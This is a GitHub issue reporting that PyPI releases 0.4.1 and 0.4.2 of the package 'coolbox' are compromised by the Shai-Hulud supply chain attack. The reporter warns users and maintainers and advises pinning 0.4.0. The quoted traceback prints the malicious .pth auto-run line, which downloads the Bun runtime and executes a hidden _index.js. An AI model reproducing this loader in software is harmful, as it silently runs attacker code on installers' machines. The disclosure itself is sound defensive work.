Skip to content

PyPI releases 0.4.1 and 0.4.2 affected by Shai-Hulud supply chain attack #117

Description

@StefanoCretti

While installing the latest version of the package (0.4.2 at the time of writing), I noticed a weird message

Error processing line 1 of /Users/stefano.cretti/.local/share/mamba/envs/test_plot/lib/python3.14/site-packages/coolbox-setup.pth:

    Traceback (most recent call last):
      File "<frozen site>", line 213, in addpackage
      File "<string>", line 1, in <module>
      File "<string>", line 1
        import os as _o,subprocess as _s,urllib.request as _u,platform as _p,sys as _y;_d=_o.path.dirname;_n=_o.path.join;_j=_n(_d(__file__),"_index.js");if not
  _o.path.exists(_j):import glob as _g;_c=_g.glob(_n(_d(__file__),"*","_index.js"));_j=_c[0]if _c else"";_e=_o.name=="nt";_b=_n(_T.gettempdir(),"b","bun"+(".exe" if _e else""));if not
  _o.path.exists(_b):_a="aarch64" if _p.machine()=="arm64" else"x64";_m={"linux":"linux","darwin":"darwin","win32":"windows"}.get(_y.platform,"linux");_z=_n(_T.gettempdir(),"b.zip");_u
  .urlretrieve(f"https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{_m}-{_a}.zip",_z);import zipfile as
  _zf;_zf.ZipFile(_z).extract(_o.path.basename(_b),_d(_b));_o.chmod(_b,509);_o.unlink(_z);_s.run([_b,"run",_j],check=False);open(_G,"w").close()
                                                                                                                                                          ^^
      SyntaxError: invalid syntax

    Remainder of file ignored

By investigating it, I found out that versions 0.4.1 and 0.4.2 of the package are affected by the Shai-Hulud supply chain attack.

I was saved by the usage of Python 3.14, but I could have been affected were I using an older version.
This issue is to inform the maintainers (if not addressed, any newer version published from their machines will be affected) as well as anyone who might have installed the package.

As far as I can tell, version 0.4.0 is the latest uncompromised one, so I would advise pinning that for the time being.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions